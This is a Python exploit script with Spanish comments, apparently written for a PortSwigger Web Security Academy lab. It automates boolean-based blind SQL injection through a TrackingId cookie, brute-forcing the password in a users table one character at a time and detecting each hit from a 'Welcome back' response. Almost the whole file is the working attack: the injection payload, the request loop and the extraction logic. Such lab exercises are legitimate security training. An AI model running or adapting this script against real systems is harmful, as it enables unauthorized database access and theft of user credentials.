#!/usr/bin/python3

from pwn import * # lo utilizaremos para barras de progreso

import requests #realizar peticiones

import signal #capturar teclado

import time # usar tiempo

import pdb # debugging

import sys # interctuar co el sistema

import string # para jugar con caracteres


def saliendo(sig, frame):
        print('\n\n[+] Saliendo...\n\n')
        sys.exit(1)


# Capturar control C
signal.signal(signal.SIGINT, saliendo) # cuando hagamos ctrl_c mandamos l flujo del progama a la funcion saliendo

#definicio de variables

urlinyectada='https://0a4c004304a4362b83ec78d900cf0024.web-security-academy.net' # url a la que inyectaremos, claramente esto lo cambiariamos
caracteres=string.printable  # añadimos todos los caracteres printeables


def peticion():

        contraseña='' # lo definimos vacio para en el bucle for ir aumentandolo
        
        progreso1 = log.progress('Fuerza bruta') # creamos una barra de progreso 1
        progreso1.status('Iniciando fuerza bruta') #le actualizamos el estado

        time.sleep(1) # damos tiempo para leer lo bien que lo hacemos

        progreso2 = log.progress('Password') # creamos la sgunda barra de progreso para qu nos actualice la pass
        progreso2.status('Analizando pasword...')

        for posicion in range(1,21): # definiremos aqui la longitud del campo a testear
                for caracter in caracteres:
                        
                        cookie= {  # definimos las cookies
                                "TrackingId":"ZgRMu4EFBAEGzBf1' and (select substring(password,%d,1) from users limit 1)='%s'-- -;" % (posicion,caracter), # claramente esto lo cambiariamos
                                "session":"AnIbPpu1h9Ssul5aMuw8ztmCCTifDlqCy" # claramente esto lo cambiariamos
                                }
                        progreso1.status(cookie['TrackingId']) # queremos que se actualice cpara que vamos lo que mandamos en cada bucle for


                        r = requests.get(urlinyectada, cookies=cookie) # realizamos la peticion a la url con las cookies

                        if "Welcome back" in r.text: # verificacion de que acertamos con el caracter, tambien podemos jgar con  length...

                                contraseña += caracter # le sumamo a contraseña el caracter en el que esté
                                progreso2.status(contraseña)
                                break # para que no continue probando el resto de caracteres 



def main():

        peticion()


main()

